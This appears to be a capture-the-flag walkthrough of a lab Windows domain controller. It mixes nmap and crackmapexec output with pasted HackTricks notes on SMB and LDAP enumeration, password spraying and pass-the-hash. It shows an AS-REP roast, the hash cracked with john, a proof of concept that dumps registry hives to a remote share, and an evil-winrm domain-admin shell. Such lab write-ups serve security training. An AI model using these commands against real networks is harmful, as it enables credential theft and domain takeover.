Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 10:44 EDT
Nmap scan report for 192.168.56.103
Host is up (0.00064s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-03 23:46:37Z) ←
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn ←
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name) ←
445/tcp open microsoft-ds? ←
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49687/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:A2:2A:A6 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows ←
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.50 seconds
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 10:45 EDT
Nmap scan report for 192.168.56.103
Host is up (0.0045s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:A2:2A:A6 (Oracle VirtualBox virtual NIC)
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required ←
Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds
<🔄 Alternative Step>
crackmapexec smb 192.168.56.103:
SMB 192.168.56.103 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) ←
</🔄 Alternative Step>
echo -e '192.168.56.103\tDC01.SOUPEDECODE.LOCAL' | tee -a /etc/hosts:
192.168.56.103 DC01.SOUPEDECODE.LOCAL ←
HackTricks
[#Possible Credentials]
Username(s)
Common passwords
(blank)
(blank)
guest
(blank)
Administrator, admin
(blank), password, administrator, admin
arcserve
arcserve, backup
tivoli, tmersrvd
tivoli, tmersrvd, admin
backupexec, backup
backupexec, backup, arcada
test, lab, demo
password, test, lab, demo
[#Obtain Information]
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password
[#List shared folders]
It is always recommended to look if you can access to anything, if you don't have credentials try using nullcredentials/guest user.
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
Kerbrute enum: When an invalid username is requested the server will respond using the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN, allowing us to determine that the username was invalid. Valid usernames will illicit either the TGT in a AS-REP response or the error KRB5KDC_ERR_PREAUTH_REQUIRED, indicating that the user is required to perform pre-authentication.
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
crackmapexec can execute commands abusing any of mmcexec, smbexec, atexec, wmiexec being wmiexec the default method. You can indicate which option you prefer to use with the parameter --exec-method:
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User bmark0 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User otara1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User kleo2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[...]
[-] User caiden36 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User xbella37 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smark38 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:dc54892842ace6ea9ae0f8dc3059e617$f1bab3f0b14d69f1e689f102399a39b0855f16d9f36dfd6a9659d25f0f8484e05592e1d921d90f53dcd80c9cf406b8cee2610214b7350f7ad1ecead5e62872ca83a6044d10c5177e6899e8ab98b3ee861eca740c9c33e8f7efb957c391d5d996e1777cf1b3a90f28799b1ad3d66b12faf35adee855b27fae4552f17d1dbc343458b45464f9e3520fd92a01f00b60dee32f96562958896ff06cbfc2600169fb0e5883a070dee21c961e703b9dc7034fb4eb0b08af27abd3423b86b842e2014e6e3e7ea0a1c98df0f0209db963a28b7515937c1163a7279c78e6e1d3d5cd9c81d3b12527709d10469d87290514cb669cb9312e775a6e65 ←
[-] User fmike40 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User yeli41 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User knina42 doesn't have UF_DONT_REQUIRE_PREAUTH set
[...]
john --wordlist=/usr/share/wordlists/rockyou.txt ./asrep_hash.txt:
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
internet ($krb5asrep$23$zximena448@SOUPEDECODE.LOCAL) ←
1g 0:00:00:00 DONE (2024-09-04 03:54) 33.33g/s 17066p/s 17066c/s 17066C/s angelo..letmein
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Try "help" to get a list of possible commands.
smb: \> dir
$WinREAgent DH 0 Sat Jun 15 15:19:51 2024
Documents and Settings DHSrn 0 Sat Jun 15 22:51:08 2024
DumpStack.log.tmp AHS 12288 Wed Sep 4 12:42:13 2024
pagefile.sys AHS 1476395008 Wed Sep 4 12:42:13 2024
PerfLogs D 0 Sat May 8 04:15:05 2021
Program Files DR 0 Sat Jun 15 13:54:31 2024
Program Files (x86) D 0 Sat May 8 05:34:13 2021
ProgramData DHn 0 Sat Jun 15 22:51:08 2024
Recovery DHSn 0 Sat Jun 15 22:51:08 2024
System Volume Information DHS 0 Sat Jun 15 15:02:21 2024
Users DR 0 Mon Jun 17 14:31:08 2024
Windows D 0 Sat Jun 15 15:21:10 2024
12942591 blocks of size 4096. 10915881 blocks available
smb: \> cd Users\zximena448\Desktop\
smb: \Users\zximena448\Desktop\> dir
. DR 0 Mon Jun 17 14:31:24 2024
.. D 0 Mon Jun 17 14:30:22 2024
desktop.ini AHS 282 Mon Jun 17 14:30:22 2024
user.txt A 33 Wed Jun 12 16:01:30 2024 ←
12942591 blocks of size 4096. 10915862 blocks available
smb: \Users\zximena448\Desktop\> get user.txt ←
getting file \Users\zximena448\Desktop\user.txt of size 33 as user.txt (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \Users\zximena448\Desktop\> exit
cat ./user.txt:
2fe79*************************** ←
HackTricks
[#Valid Credentials]
If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using:
# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
If you find something saying that the "bind must be completed" means that the credentials are incorrect.
You can extract everything from a domain using:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
Or create a smb share using samba:
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart
Windows:
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
A simple POC that abuses Backup Operator privileges to remote dump SAM, SYSTEM, and SECURITY hives.
[#Usage]
This proof of concept is a modified version of impacket/examples/reg.py and will work with the most recent impacket release installed. All supported impacket authentication mechanisms will work.
root@kali:~# python3 reg.py jsmith:'Spring2021'@10.0.229.1 backup -p '\\10.0.220.51\share'
Impacket v0.9.25.dev1+20220208.122405.769c3196 - Copyright 2021 SecureAuth Corporation
Dumping SAM hive to \\10.0.220.51\share\SAM
Dumping SYSTEM hive to \\10.0.220.51\share\SYSTEM
Dumping SECURITY hive to \\10.0.220.51\share\SECURITY
To use evil-winrm to connect to an IPv6 address create an entry inside /etc/hosts setting a domain name to the IPv6 address and connect to that domain.
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint ←
whoami:
soupedecode\administrator ←
whoami /groups:
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================== ================ =========================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Group Policy Creator Owners Group S-1-5-21-2986980474-46765180-2505414164-520 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Domain Admins Group S-1-5-21-2986980474-46765180-2505414164-512 Mandatory group, Enabled by default, Enabled group ←
SOUPEDECODE\Enterprise Admins Group S-1-5-21-2986980474-46765180-2505414164-519 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Schema Admins Group S-1-5-21-2986980474-46765180-2505414164-518 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Denied RODC Password Replication Group Alias S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
whoami /priv:
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
